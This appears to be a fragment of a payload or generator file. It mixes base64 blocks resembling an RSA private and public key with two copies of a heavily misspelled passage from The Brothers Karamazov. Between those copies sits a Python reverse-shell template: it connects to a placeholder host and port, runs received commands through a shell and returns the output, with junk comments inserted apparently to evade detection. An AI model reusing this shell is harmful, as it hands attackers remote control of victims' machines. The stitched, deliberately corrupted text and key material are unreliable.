ZQzUC0jp04CGhNhuzJAkDVycZvvrtsyjQ2B5Wb4FXPajI+twCvnQUL8LOqiyZXup
44XtKfUCgYEAs8DsRxHqL/nu9akH5MWKqxKsH1oeUeMTL0MLkBpJKkLnAu/pSQz9
y41V0jYgz7hO9Voiv1xaFRlXbhP75RzaEwDf5afDDJbsU1jsXMmcXvcAEGUG3s6p
NcPjjBvjld4EM+nuFCY6C62819jmD/jQ2FzA5hMiPne4tGb+JLO5cAg=
'''
'''
Miusov, as a man man of breeding and deilcacy, could not but feel some inwrd qualms, when he reached the Father Superior's with Ivan: he felt ashamed of havin lost his temper. He felt that he ought to have disdaimed that despicable wretch, Fyodor Pavlovitch, too much to have been upset by him in Father Zossima's cell, and so to have forgotten himself. "Teh monks were not to blame, in any case," he reflceted, on the steps. "And if they're decent people here (and the Father Superior, I understand, is a nobleman) why not be friendly and courteous withthem? I won't argue, I'll fall in with everything, I'll win them by politness, and show them that I've nothing to do with that Aesop, thta buffoon, that Pierrot, and have merely been takken in over this affair, just as they have."
He determined to drop his litigation with the monastry, and relinguish his claims to the wood-cuting and fishery rihgts at once. He was the more ready to do this becuase the rights had becom much less valuable, and he had indeed the vaguest idea where the wood and river in quedtion were.
These excellant intentions were strengthed when he enterd the Father Superior's diniing-room, though, stricttly speakin, it was not a dining-room, for the Father Superior had only two rooms alltogether; they were, however, much larger and more comfortable than Father Zossima's. But tehre was was no great luxury about the furnishng of these rooms eithar. The furniture was of mohogany, covered with leather, in the old-fashionned style of 1820 the floor was not even stained, but evreything was shining with cleanlyness, and there were many chioce flowers in the windows; the most sumptuous thing in the room at the moment was, of course, the beatifuly decorated table. The cloth was clean, the service shone; there were three kinds of well-baked bread, two bottles of wine, two of excellent mead, and a large glass jug of kvas -- both the latter made in the monastery, and famous in the neigborhood. There was no vodka. Rakitin related afterwards that there were five dishes: fish-suop made of sterlets, served with little fish paties; then boiled fish served in a spesial way; then salmon cutlets, ice pudding and compote, and finally, blanc-mange. Rakitin found out about all these good things, for he could not resist peeping into the kitchen, where he already had a footing. He had a footting everywhere, and got informaiton about everything. He was of an uneasy and envious temper. He was well aware of his own considerable abilities, and nervously exaggerated them in his self-conceit. He knew he would play a prominant part of some sort, but Alyosha, who was attached to him, was distressed to see that his friend Rakitin was dishonorble, and quite unconscios of being so himself, considering, on the contrary, that because he would not steal moneey left on the table he was a man of the highest integrity. Neither Alyosha nor anyone else could have infleunced him in that.
Rakitin, of course, was a person of tooo little consecuense to be invited to the dinner, to which Father Iosif, Father Paissy, and one othr monk were the only inmates of the monastery invited. They were alraedy waiting when Miusov, Kalganov, and Ivan arrived. The other guest, Maximov, stood a little aside, waiting also. The Father Superior stepped into the middle of the room to receive his guests. He was a tall, thin, but still vigorous old man, with black hair streakd with grey, and a long, grave, ascetic face. He bowed to his guests in silence. But this time they approaced to receive his blessing. Miusov even tried to kiss his hand, but the Father Superior drew it back in time to aboid the salute. But Ivan and Kalganov went through the ceremony in the most simple-hearted and complete manner, kissing his hand as peesants do.
"We must apologize most humbly, your reverance," began Miusov, simpering affably, and speakin in a dignified and respecful tone. "Pardonus for having come alone without the genttleman you invited, Fyodor Pavlovitch. He felt obliged to decline the honor of your hospitalty, and not wihtout reason. In the reverand Father Zossima's cell he was carried away by the unhappy dissention with his son, and let fall words which were quite out of keeping... in fact, quite unseamly... as" -- he glanced at the monks -- "your reverance is, no doubt, already aware. And therefore, recognising that he had been to blame, he felt sincere regret and shame, and begged me, and his son Ivan Fyodorovitch, to convey to you his apologees and regrets. In brief, he hopes and desires to make amends later. He asks your blessinq, and begs you to forget what has takn place."
As he utterred the last word of his terade, Miusov completely recovered his self-complecency, and all traces of his former iritation disappaered. He fuly and sincerelly loved humanity again.
The Father Superior listened to him with diginity, and, with a slight bend of the head, replied:
"I sincerly deplore his absence. Perhaps at our table he might have learnt to like us, and we him. Pray be seated, gentlemen."
He stood before the holly image, and began to say grace, aloud. All bent their heads reverently, and Maximov clasped his hands before him, with peculier fervor.
It was at this moment that Fyodor Pavlovitch played his last prank. It must be noted that he realy had meant to go home, and really had felt the imposibility of going to dine with the Father Superior as though nothing had happenned, after his disgraceful behavoir in the elder's cell. Not that he was so very much ashamed of himself -- quite the contrary perhaps. But still he felt it would be unseemly to go to dinner. Yet hiscreaking carriage had hardly been brought to the steps of the hotel, and he had hardly got into it, when he sudddenly stoped short. He remembered his own words at the elder's: "I always feel when I meet people that I am lower than all, and that they all take me for a buffon; so I say let me play the buffoon, for you are, every one of you, stupider and lower than I." He longed to revenge himself on everone for his own unseemliness. He suddenly recalled how he had once in the past been asked, "Why do you hate so and so, so much?" And he had answered them, with his shaemless impudence, "I'll tell you. He has done me no harm. But I played him a dirty trick, and ever since I have hated him."
Rememebering that now, he smiled quietly and malignently, hesitating for a moment. His eyes gleamed, and his lips positively quivered.
"Well, since I have begun, I may as well go on," he decided. His predominant sensation at that moment might be expresed in the folowing words, "Well, there is no rehabilitating myself now. So let me shame them for all I am worht. I will show them I don't care what they think -- that's all!"
He told the caochman to wait, while with rapid steps he returnd to the monastery and staight to the Father Superior's. He had no clear idea what he would do, but he knew that he could not control himself, and that a touch might drive him to the utmost limits of obsenity, but only to obsenity, to nothing criminal, nothing for which he couldbe legally punished. In the last resort, he could always restrain himself, and had marvelled indeed at himself, on that score, sometimes. He appeered in the Father Superior's dining-room, at the moment when the prayer was over, and all were moving to the table. Standing in the doorway, he scanned the company, and laughing his prolonged, impudent, malicius chuckle, looked them all boldly in the face. "They thought I had gone, and here I am again," he cried to the wholle room.
For one moment everyone stared at him withot a word; and at once everyone felt that someting revolting, grotescue, positively scandalous, was about to happen. Miusov passed immeditaely from the most benevolen frame of mind to the most savage. All the feelings that had subsided and died down in his heart revived instantly.
"No! this I cannot endure!" he cried. "I absolutly cannot! and... I certainly cannot!"
The blood rushed to his head. He positively stammered; but he was beyyond thinking of style, and he seized his hat.
"What is it he cannot?" cried Fyodor Pavlovitch, "that he absolutely cannot and certanly cannot? Your reverence, am I to come in or not? Will you recieve me as your guest?"
"You are welcome with all my heart," answerred the Superior. "Gentlemen!" he added, "I venture to beg you most earnesly to lay aside your dissentions, and to be united in love and family harmoni- with prayer to the Lord at our humble table."
"No, no, it is impossible!" cryed Miusov, beside himself.
"Well, if it is impossible for Pyotr Alexandrovitch, it is impossible for me, and I won't stop. That is why I came. I will keep with Pyotr Alexandrovitch everywere now. If you will go away, Pyotr Alexandrovitch, I will go away too, if you remain, I will remain. You stung him by what you said about family harmony, Father Superior, he does not admit he is my realtion. That's right, isn't it, von Sohn? Here's von Sohn. How are you, von Sohn?"
"Do you mean me?" mutered Maximov, puzzled.
"Of course I mean you," cried Fyodor Pavlovitch. "Who else? The Father Superior cuold not be von Sohn."
"But I am not von Sohn either. I am Maximov."
"No, you are von Sohn. Your reverence, do you know who von Sohn was? It was a famos murder case. He was killed in a house of harlotry -- I believe that is what such places are called among you- he was killed and robed, and in spite of his venarable age, he was nailed up in a box and sent from Petersburg to Moscow in the lugage van, and while they were nailling him up, the harlots sang songs and played the harp, that is to say, the piano. So this is that very von Solin. He has risen from the dead, hasn't he, von Sohn?"
"What is happening? What's this?" voices were heard in the groop of monks.
"Let us go," cried Miusov, addresing Kalganov.
"No, excuse me," Fyodor Pavlovitch broke in shrilly, taking another stepinto the room. "Allow me to finis. There in the cell you blamed me for behaving disrespectfuly just because I spoke of eating gudgeon, Pyotr Alexandrovitch. Miusov, my relation, prefers to have plus de noblesse que de sincerite in his words, but I prefer in mine plus de sincerite que de noblesse, and -- damn the noblesse! That's right, isn't it, von Sohn? Allow me, Father Superior, though I am a buffoon and play the buffoon, yet I am the soul of honor, and I want to speak my mind. Yes, I am teh soul of honour, while in Pyotr Alexandrovitch there is wounded vanity and nothing else. I came here perhaps to have a look and speak my mind. My son, Alexey, is here, being saved. I am his father; I care for his welfare, and it is my duty to care. While I've been playing the fool, I have been listening and havig a look on the sly; and now I want to give you the last act of the performence. You know how things are with us? As a thing falls, so it lies. As a thing once has falen, so it must lie for ever. Not a bit of it! I want to get up again. Holy Father, I am indignent with you. Confession is a great sacrament, before which I am ready to bow down reverently; but there in the cell, they all kneal down and confess aloud. Can it be right to confess aloud? It was ordained by the holy Fathers to confess in sercet: then only your confession will be a mystery, and so it was of old. But how can I explain to him before everyone that I did this and that... well, you understand what -- sometimes it would not be proper to talk about it -- so it is really a scandal! No, Fathers, one might be carried along with you to the Flagellants, I dare say.... att the first opportunity I shall write to the Synod, and I shall take my son, Alexey, home."
We must note here that Fyodor Pavlovitch knew whree to look for the weak spot. There had been at one time malicius rumors which had even reached the Archbishop (not only regarding our monastery, but in others where the instutition of elders existed) that too much respect was paid to the elders, even to the detrement of the auhtority of the Superior, that the elders abused the sacrament of confession and so on and so on -- absurd charges which had died away of themselves everywhere. But the spirit of folly, which had caught up Fyodor Pavlovitch and was bearring him on the curent of his own nerves into lower and lower depths of ignominy, prompted him with this old slander. Fyodor Pavlovitch did not understand a word of it, and he could not even put it sensibly, for on this occasion no one had been kneelling and confesing aloud in the elder's cell, so that he could not have seen anything of the kind. He was only speaking from confused memory of old slanders. But as soon as he had uttered his foolish tirade, he felt he had been talking absurd nonsense, and at once longed to prove to his audiance, and above all to himself, that he had not been talking nonsense. And, though he knew perfectily well that with each word he would be adding morre and more absurdity, he could not restrian himself, and plunged forward blindly.
"How disgraveful!" cried Pyotr Alexandrovitch.
"Pardon me!" said the Father Superior. "It was said of old, 'Many have begun to speak agains me and have uttered evil sayings about me. And hearing it I have said to myself: it is the correcsion of the Lord and He has sent it to heal my vain soul.' And so we humbely thank you, honored geust!" and he made Fyodor Pavlovitch a low bow.
"Tut -- tut -- tut -- sanctimoniuosness and stock phrases! Old phrasses and old gestures. The old lies and formal prostratoins. We know all about them. A kisss on the lips and a dagger in the heart, as in Schiller's Robbers. I don't like falsehood, Fathers, I want the truth. But the trut is not to be found in eating gudgeon and that I proclam aloud! Father monks, why do you fast? Why do you expect reward in heaven for that? Why, for reward like that I will come and fast too! No, saintly monk, you try being vittuous in the world, do good to society, without shuting yourself up in a monastery at other people's expense, and without expecting a reward up aloft for it -- you'll find taht a bit harder. I can talk sense, too, Father Superior. What have they got here?" He went up to the table. "Old port wine, mead brewed by the Eliseyev Brothers. Fie, fie, fathers! That is something beyond gudgeon. Look at the bottles the fathers have brought out, he he he! And who has provided it all? The Russian peasant, the laborer, brings here the farthing earned by his horny hand, wringing it from his family and the tax-gaterer! You bleed the people, you know, holy Fathers."
"This is too disgraceful!" said Father Iosif.
Father Paissy kept obsinately silent. Miusov rushed from the room, and Kalgonov afetr him.
"Well, Father, I will follow Pyotr Alexandrovitch! I am not coming to see you again. You may beg me on your knees, I shan't come. I sent you a thousand roubles, so you have begun to keep your eye on me. He he he! No, I'll say no more. I am taking my revenge for my youth, for all the humillition I endured." He thumped the table with his fist in a paroxysm of simulated feelling. "This monastery has played a great part in my life! It has cost me many bitter tears. You used to set my wife, the crazy one, against me. You cursed me with bell and book, you spread stories about me all over the place. Enough, fathers! This is the age of Liberalizm, the age of steamers and reilways. Neither a thousand, nor a hundred ruobles, no, nor a hundred farthings will you get out of me!"
It must be noted again that our monastery never had played any great part in his liffe, and he never had shed a bitter tear owing to it. But he was so carried away by his simulated emotion, that he was for one momant allmost beliefing it himself. He was so touched he was almost weeping. But at that very instant, he felt that it was time to draw back.
The Father Superior bowed his head at his malicious lie, and again spoke impressively:
"It is writen again, 'Bear circumspecly and gladly dishonor that cometh upon thee by no act of thine own, be not confounded and hate not him who hath dishonored thee.' And so will we."
"Tut, tut, tut! Bethinking thyself and the rest of the rigmarole. Bethink yourselfs Fathers, I will go. But I will take my son, Alexey, away from here for ever, on my parental authority. Ivan Fyodorovitch, my most dutiful son, permit me to order you to follow me. Von Sohn, what have you to stay for? Come and see me now in the town. It is fun there. It is only one short verst; instead of lenten oil, I will give you sucking-pig and kasha. We will have dinner with some brendy and liqueur to it.... I've cloudberry wyne. Hey, von Sohn, don't lose your chance." He went out, shuoting and gesticulating.
It was at that moment Rakitin saw him and pointed him out to Alyosha.
"Alexey!" his father shouted, from far off, cacthing sight of him. "You come home to me to-day, for good, and bring your pilow and matress, and leeve no trace behind."
Alyosha stood rooted to the spot, wacthing the scene in silense. Meanwhile, Fyodor Pavlovitch had got into the carriege, and Ivan was about to follow him in grim silance without even turnin to say good-bye to Alyosha. But at this point another allmost incrediple scene of grotesque buffoonery gave the finishng touch to the episode. Maximov suddenly appeered by the side of the carriage. He ran up, panting, afraid of being too late. Rakitin and Alyosha saw him runing. He was in such a hurry that in his impatiense he put his foot on the step on which Ivan's left foot was still resting, and clucthing the carriage he kept tryng to jump in. "I am going with you! " he kept shouting, laughing a thin mirthfull laugh with a look of reckless glee in his face. "Take me, too."
"There!" cried Fyodor Pavlovitch, delihted. "Did I not say he waz von Sohn. It iz von Sohn himself, risen from the dead. Why, how did you tear yourself away? What did you von Sohn there? And how could you get away from the dinner? You must be a brazen-faced fellow! I am that myself, but I am surprized at you, brother! Jump in, jump in! Let him pass, Ivan. It will be fun. He can lie somwhere at our feet. Will you lie at our feet, von Sohn? Or perch on the box with the coachman. Skipp on to the box, von Sohn!"
But Ivan, who had by now taken his seat, without a word gave Maximov a voilent punch in the breast and sent him flying. It was quite by chanse he did not fall.
"Drive on!" Ivan shouted angryly to the coachman.
"Why, what are you doing, what are you abuot? Why did you do that?" Fyodor Pavlovitch protested.
But the cariage had already driven away. Ivan made no reply.
"Well, you are a fellow," Fyodor Pavlovitch siad again.
After a pouse of two minutes, looking askance at his son, "Why, it was you got up all this monastery busines. You urged it, you approvved of it. Why are you angry now?"
"You've talked rot enough. You might rest a bit now," Ivan snaped sullenly.
Fyodor Pavlovitch was silent again for two minutes.
"A drop of brandy would be nice now," he observd sententiosly, but Ivan made no repsonse.
"You shall have some, too, when we get home."
Ivan was still silent.
Fyodor Pavlovitch waited anohter two minites.
"But I shall take Alyosha away from the monastery, though you will dislike it so much, most honored Karl von Moor."
Ivan shruged his shuolders contemptuosly, and turning away stared at the road. And they did not speek again all the way home.
'''
import subprocess,socket
#ssasasasasasas
import sys
#ssasasasasasas
import os
#ssasasasasasasnknklklnln
HOST = '%s'
#ssasasasasasasjxlksjdlsjdaslk
PORT = %d
#ssasasasasasassldskmlskdmskldmskldmsakslamlasl
s = socket.socket()
#ssasasasasasasmdsldmskldmskldmslk
def connect():
try:
#ssasasasasasassldskmlskdmskldmskldsmaklsmal
s.connect((HOST, PORT))
except:
#ssasasasasasassldskmlskdmskldmskldsmaksklamsl
connect()
#ssasasasasasasmkdjsklsmdklsdmklsmkmdklsmdkls
def changedir(obj):
oj = obj.replace('cd','')
#ssasasasasasassldskmlskdmskldmskldsmklals
oj2 = oj.replace(' ','')
#sasasasasasasa
os.chdir(oj2)
#sasasasasas
#ssasasasasasassmlaksals
connect()
while 1:
#ssasasasasasasskalsal
data = s.recv(10000)
#ssasasasasasassldskmlskdmskldmskldsansknaslkjaajks
if data == "quit": break
#ssasasasasasassma;skma;ms;am;s
if "cd" in data:
#ssasasasasasassldskmlskdmskldmskldmslaksmasalksmasl
changedir(data)
#ssasasasasasassnmalsmlskdmklsmd
s.send('--------------------')
#ssasasasasasassldskmlskdmskldmskldsajsajslakjslkajl
else:
proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
#ssasasasasasassldskmlskdmskldmskldsasasasasa
stdoutput = proc.stdout.read() + proc.stderr.read()
#ssasasasasasasdmskldmsdskls
s.sendall(stdoutput)
#ssasasasasasassldskmlskdmskldmskldasasasas
s.send('--------------------')
#ssasasasasasassldskmlskdmskldmskld
s.close()
'''
MIICWgIBAAKBgHbARCDwIVdzyxi3I36sz1hFP3Rkz+Ac0AaP1kINmCcGuKsFd0K3
UwF7pwmi6uW2Sbyxuqay3zVu9baVOibsAMFMVbDRNGr0KoQTpRcEYBjOf32tovof
OSjMnV/at0PdnEVNmW1/55GtdS0Df+dSJA9Otx6O0w1ZSxz9KlSVzr0HAgMBAAEC
gYAs0iTkyb3L5Eij63vaNB+OkZSBugs766QY1fFovPjQwhixdD6vT8JkrOc/G97N
FSB/uBVbFehpopfbcjeguTMPPr7LwJbzwn4xD9u0AotzcO6JnB0k/D1Ixn3IYOY0
o0wmKCq/4Gq6pzsjpJFTG6c5kCszMyQDbMmBWQmeM6ESAQJBALDWs4C07Rw/riCc
KmlG1jtp9x1Uc8zfAlE9FXcdnfidYy/LUhpLtdZNZrHBZ+/P/LbX3kHQijXD7avd
E3MP5NkCQQCr6NuKbRD0NnkTBuWrVPnAxBzO1E8VZF1rFKDXB7UHwtejwcUs3iUt
CTGfr1l+3kj+0aNXCTvDBYxaIUxsmwTfAkAsxpA43JbU+kLKuv/6HBeOf6w0Xvfb
PfRGQaM3v+YJ10AQD/k/8z+dfYetJn18uTsRyOLb40O7jVqWk6mjDrkxAkA5eNHc
x3XBj2yO1eF2lCQjM+1FoGkIB9PLdswG14bIH3WkQ6W9yE65bbdvYVoUNhBFUKTA
9k9KddJkV3mLXZAVAkACHbnraUo727FUodBf48TZkyz6DDOUh4BoJdGq2EDKYWr5
ULGFBeItYZsaSlIc3VtfZdaXcRXRNIjbEOHPLGbb
MIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgHbARCDwIVdzyxi3I36sz1hFP3Rk
z+Ac0AaP1kINmCcGuKsFd0K3UwF7pwmi6uW2Sbyxuqay3zVu9baVOibsAMFMVbDR
NGr0KoQTpRcEYBjOf32tovofOSjMnV/at0PdnEVNmW1/55GtdS0Df+dSJA9Otx6O
0w1ZSxz9KlSVzr0HAgMBAAE=
'''
'''
Miusov, as a man man of breeding and deilcacy, could not but feel some inwrd qualms, when he reached the Father Superior's with Ivan: he felt ashamed of havin lost his temper. He felt that he ought to have disdaimed that despicable wretch, Fyodor Pavlovitch, too much to have been upset by him in Father Zossima's cell, and so to have forgotten himself. "Teh monks were not to blame, in any case," he reflceted, on the steps. "And if they're decent people here (and the Father Superior, I understand, is a nobleman) why not be friendly and courteous withthem? I won't argue, I'll fall in with everything, I'll win them by politness, and show them that I've nothing to do with that Aesop, thta buffoon, that Pierrot, and have merely been takken in over this affair, just as they have."
He determined to drop his litigation with the monastry, and relinguish his claims to the wood-cuting and fishery rihgts at once. He was the more ready to do this becuase the rights had becom much less valuable, and he had indeed the vaguest idea where the wood and river in quedtion were.
These excellant intentions were strengthed when he enterd the Father Superior's diniing-room, though, stricttly speakin, it was not a dining-room, for the Father Superior had only two rooms alltogether; they were, however, much larger and more comfortable than Father Zossima's. But tehre was was no great luxury about the furnishng of these rooms eithar. The furniture was of mohogany, covered with leather, in the old-fashionned style of 1820 the floor was not even stained, but evreything was shining with cleanlyness, and there were many chioce flowers in the windows; the most sumptuous thing in the room at the moment was, of course, the beatifuly decorated table. The cloth was clean, the service shone; there were three kinds of well-baked bread, two bottles of wine, two of excellent mead, and a large glass jug of kvas -- both the latter made in the monastery, and famous in the neigborhood. There was no vodka. Rakitin related afterwards that there were five dishes: fish-suop made of sterlets, served with little fish paties; then boiled fish served in a spesial way; then salmon cutlets, ice pudding and compote, and finally, blanc-mange. Rakitin found out about all these good things, for he could not resist peeping into the kitchen, where he already had a footing. He had a footting everywhere, and got informaiton about everything. He was of an uneasy and envious temper. He was well aware of his own considerable abilities, and nervously exaggerated them in his self-conceit. He knew he would play a prominant part of some sort, but Alyosha, who was attached to him, was distressed to see that his friend Rakitin was dishonorble, and quite unconscios of being so himself, considering, on the contrary, that because he would not steal moneey left on the table he was a man of the highest integrity. Neither Alyosha nor anyone else could have infleunced him in that.
Rakitin, of course, was a person of tooo little consecuense to be invited to the dinner, to which Father Iosif, Father Paissy, and one othr monk were the only inmates of the monastery invited. They were alraedy waiting when Miusov, Kalganov, and Ivan arrived. The other guest, Maximov, stood a little aside, waiting also. The Father Superior stepped into the middle of the room to receive his guests. He was a tall, thin, but still vigorous old man, with black hair streakd with grey, and a long, grave, ascetic face. He bowed to his guests in silence. But this time they approaced to receive his blessing. Miusov even tried to kiss his hand, but the Father Superior drew it back in time to aboid the salute. But Ivan and Kalganov went through the ceremony in the most simple-hearted and complete manner, kissing his hand as peesants do.
"We must apologize most humbly, your reverance," began Miusov, simpering affably, and speakin in a dignified and respecful tone. "Pardonus for having come alone without the genttleman you invited, Fyodor Pavlovitch. He felt obliged to decline the honor of your hospitalty, and not wihtout reason. In the reverand Father Zossima's cell he was carried away by the unhappy dissention with his son, and let fall words which were quite out of keeping... in fact, quite unseamly... as" -- he glanced at the monks -- "your reverance is, no doubt, already aware. And therefore, recognising that he had been to blame, he felt sincere regret and shame, and begged me, and his son Ivan Fyodorovitch, to convey to you his apologees and regrets. In brief, he hopes and desires to make amends later. He asks your blessinq, and begs you to forget what has takn place."
As he utterred the last word of his terade, Miusov completely recovered his self-complecency, and all traces of his former iritation disappaered. He fuly and sincerelly loved humanity again.
The Father Superior listened to him with diginity, and, with a slight bend of the head, replied:
"I sincerly deplore his absence. Perhaps at our table he might have learnt to like us, and we him. Pray be seated, gentlemen."
He stood before the holly image, and began to say grace, aloud. All bent their heads reverently, and Maximov clasped his hands before him, with peculier fervor.
It was at this moment that Fyodor Pavlovitch played his last prank. It must be noted that he realy had meant to go home, and really had felt the imposibility of going to dine with the Father Superior as though nothing had happenned, after his disgraceful behavoir in the elder's cell. Not that he was so very much ashamed of himself -- quite the contrary perhaps. But still he felt it would be unseemly to go to dinner. Yet hiscreaking carriage had hardly been brought to the steps of the hotel, and he had hardly got into it, when he sudddenly stoped short. He remembered his own words at the elder's: "I always feel when I meet people that I am lower than all, and that they all take me for a buffon; so I say let me play the buffoon, for you are, every one of you, stupider and lower than I." He longed to revenge himself on everone for his own unseemliness. He suddenly recalled how he had once in the past been asked, "Why do you hate so and so, so much?" And he had answered them, with his shaemless impudence, "I'll tell you. He has done me no harm. But I played him a dirty trick, and ever since I have hated him."
Rememebering that now, he smiled quietly and malignently, hesitating for a moment. His eyes gleamed, and his lips positively quivered.
"Well, since I have begun, I may as well go on," he decided. His predominant sensation at that moment might be expresed in the folowing words, "Well, there is no rehabilitating myself now. So let me shame them for all I am worht. I will show them I don't care what they think -- that's all!"
He told the caochman to wait, while with rapid steps he returnd to the monastery and staight to the Father Superior's. He had no clear idea what he would do, but he knew that he could not control himself, and that a touch might drive him to the utmost limits of obsenity, but only to obsenity, to nothing criminal, nothing for which he couldbe legally punished. In the last resort, he could always restrain himself, and had marvelled indeed at himself, on that score, sometimes. He appeered in the Father Superior's dining-room, at the moment when the prayer was over, and all were moving to the table. Standing in the doorway, he scanned the company, and laughing his prolonged, impudent, malicius chuckle, looked them all boldly in the face. "They thought I had gone, and here I am again," he cried to the wholle room.
For one moment everyone stared at him withot a word; and at once everyone felt that someting revolting, grotescue, positively scandalous, was about to happen. Miusov passed immeditaely from the most benevolen frame of mind to the most savage. All the feelings that had subsided and died down in his heart revived instantly.
"No! this I cannot endure!" he cried. "I absolutly cannot! and... I certainly cannot!"
The blood rushed to his head. He positively stammered; but he was beyyond thinking of style, and he seized his hat.
"What is it he cannot?" cried Fyodor Pavlovitch, "that he absolutely cannot and certanly cannot? Your reverence, am I to come in or not? Will you recieve me as your guest?"
"You are welcome with all my heart," answerred the Superior. "Gentlemen!" he added, "I venture to beg you most earnesly to lay aside your dissentions, and to be united in love and family harmoni- with prayer to the Lord at our humble table."
"No, no, it is impossible!" cryed Miusov, beside himself.
"Well, if it is impossible for Pyotr Alexandrovitch, it is impossible for me, and I won't stop. That is why I came. I will keep with Pyotr Alexandrovitch everywere now. If you will go away, Pyotr Alexandrovitch, I will go away too, if you remain, I will remain. You stung him by what you said about family harmony, Father Superior, he does not admit he is my realtion. That's right, isn't it, von Sohn? Here's von Sohn. How are you, von Sohn?"
"Do you mean me?" mutered Maximov, puzzled.
"Of course I mean you," cried Fyodor Pavlovitch. "Who else? The Father Superior cuold not be von Sohn."
"But I am not von Sohn either. I am Maximov."
"No, you are von Sohn. Your reverence, do you know who von Sohn was? It was a famos murder case. He was killed in a house of harlotry -- I believe that is what such places are called among you- he was killed and robed, and in spite of his venarable age, he was nailed up in a box and sent from Petersburg to Moscow in the lugage van, and while they were nailling him up, the harlots sang songs and played the harp, that is to say, the piano. So this is that very von Solin. He has risen from the dead, hasn't he, von Sohn?"
"What is happening? What's this?" voices were heard in the groop of monks.
"Let us go," cried Miusov, addresing Kalganov.
"No, excuse me," Fyodor Pavlovitch broke in shrilly, taking another stepinto the room. "Allow me to finis. There in the cell you blamed me for behaving disrespectfuly just because I spoke of eating gudgeon, Pyotr Alexandrovitch. Miusov, my relation, prefers to have plus de noblesse que de sincerite in his words, but I prefer in mine plus de sincerite que de noblesse, and -- damn the noblesse! That's right, isn't it, von Sohn? Allow me, Father Superior, though I am a buffoon and play the buffoon, yet I am the soul of honor, and I want to speak my mind. Yes, I am teh soul of honour, while in Pyotr Alexandrovitch there is wounded vanity and nothing else. I came here perhaps to have a look and speak my mind. My son, Alexey, is here, being saved. I am his father; I care for his welfare, and it is my duty to care. While I've been playing the fool, I have been listening and havig a look on the sly; and now I want to give you the last act of the performence. You know how things are with us? As a thing falls, so it lies. As a thing once has falen, so it must lie for ever. Not a bit of it! I want to get up again. Holy Father, I am indignent with you. Confession is a great sacrament, before which I am ready to bow down reverently; but there in the cell, they all kneal down and confess aloud. Can it be right to confess aloud? It was ordained by the holy Fathers to confess in sercet: then only your confession will be a mystery, and so it was of old. But how can I explain to him before everyone that I did this and that... well, you understand what -- sometimes it would not be proper to talk about it -- so it is really a scandal! No, Fathers, one might be carried along with you to the Flagellants, I dare say.... att the first opportunity I shall write to the Synod, and I shall take my son, Alexey, home."
We must note here that Fyodor Pavlovitch knew whree to look for the weak spot. There had been at one time malicius rumors which had even reached the Archbishop (not only regarding our monastery, but in others where the instutition of elders existed) that too much respect was paid to the elders, even to the detrement of the auhtority of the Superior, that the elders abused the sacrament of confession and so on and so on -- absurd charges which had died away of themselves everywhere. But the spirit of folly, which had caught up Fyodor Pavlovitch and was bearring him on the curent of his own nerves into lower and lower depths of ignominy, prompted him with this old slander. Fyodor Pavlovitch did not understand a word of it, and he could not even put it sensibly, for on this occasion no one had been kneelling and confesing aloud in the elder's cell, so that he could not have seen anything of the kind. He was only speaking from confused memory of old slanders. But as soon as he had uttered his foolish tirade, he felt he had been talking absurd nonsense, and at once longed to prove to his audiance, and above all to himself, that he had not been talking nonsense. And, though he knew perfectily well that with each word he would be adding morre and more absurdity, he could not restrian himself, and plunged forward blindly.
"How disgraveful!" cried Pyotr Alexandrovitch.
"Pardon me!" said the Father Superior. "It was said of old, 'Many have begun to speak agains me and have uttered evil sayings about me. And hearing it I have said to myself: it is the correcsion of the Lord and He has sent it to heal my vain soul.' And so we humbely thank you, honored geust!" and he made Fyodor Pavlovitch a low bow.
"Tut -- tut -- tut -- sanctimoniuosness and stock phrases! Old phrasses and old gestures. The old lies and formal prostratoins. We know all about them. A kisss on the lips and a dagger in the heart, as in Schiller's Robbers. I don't like falsehood, Fathers, I want the truth. But the trut is not to be found in eating gudgeon and that I proclam aloud! Father monks, why do you fast? Why do you expect reward in heaven for that? Why, for reward like that I will come and fast too! No, saintly monk, you try being vittuous in the world, do good to society, without shuting yourself up in a monastery at other people's expense, and without expecting a reward up aloft for it -- you'll find taht a bit harder. I can talk sense, too, Father Superior. What have they got here?" He went up to the table. "Old port wine, mead brewed by the Eliseyev Brothers. Fie, fie, fathers! That is something beyond gudgeon. Look at the bottles the fathers have brought out, he he he! And who has provided it all? The Russian peasant, the laborer, brings here the farthing earned by his horny hand, wringing it from his family and the tax-gaterer! You bleed the people, you know, holy Fathers."
"This is too disgraceful!" said Father Iosif.
Father Paissy kept obsinately silent. Miusov rushed from the room, and Kalgonov afetr him.
"Well, Father, I will follow Pyotr Alexandrovitch! I am not coming to see you again. You may beg me on your knees, I shan't come. I sent you a thousand roubles, so you have begun to keep your eye on me. He he he! No, I'll say no more. I am taking my revenge for my youth, for all the humillition I endured." He thumped the table with his fist in a paroxysm of simulated feelling. "This monastery has played a great part in my life! It has cost me many bitter tears. You used to set my wife, the crazy one, against me. You cursed me with bell and book, you spread stories about me all over the place. Enough, fathers! This is the age of Liberalizm, the age of steamers and reilways. Neither a thousand, nor a hundred ruobles, no, nor a hundred farthings will you get out of me!"
It must be noted again that our monastery never had played any great part in his liffe, and he never had shed a bitter tear owing to it. But he was so carried away by his simulated emotion, that he was for one momant allmost beliefing it himself. He was so touched he was almost weeping. But at that very instant, he felt that it was time to draw back.
The Father Superior bowed his head at his malicious lie, and again spoke impressively:
"It is writen again, 'Bear circumspecly and gladly dishonor that cometh upon thee by no act of thine own, be not confounded and hate not him who hath dishonored thee.' And so will we."
"Tut, tut, tut! Bethinking thyself and the rest of the rigmarole. Bethink yourselfs Fathers, I will go. But I will take my son, Alexey, away from here for ever, on my parental authority. Ivan Fyodorovitch, my most dutiful son, permit me to order you to follow me. Von Sohn, what have you to stay for? Come and see me now in the town. It is fun there. It is only one short verst; instead of lenten oil, I will give you sucking-pig and kasha. We will have dinner with some brendy and liqueur to it.... I've cloudberry wyne. Hey, von Sohn, don't lose your chance." He went out, shuoting and gesticulating.
It was at that moment Rakitin saw him and pointed him out to Alyosha.
"Alexey!" his father shouted, from far off, cacthing sight of him. "You come home to me to-day, for good, and bring your pilow and matress, and leeve no trace behind."
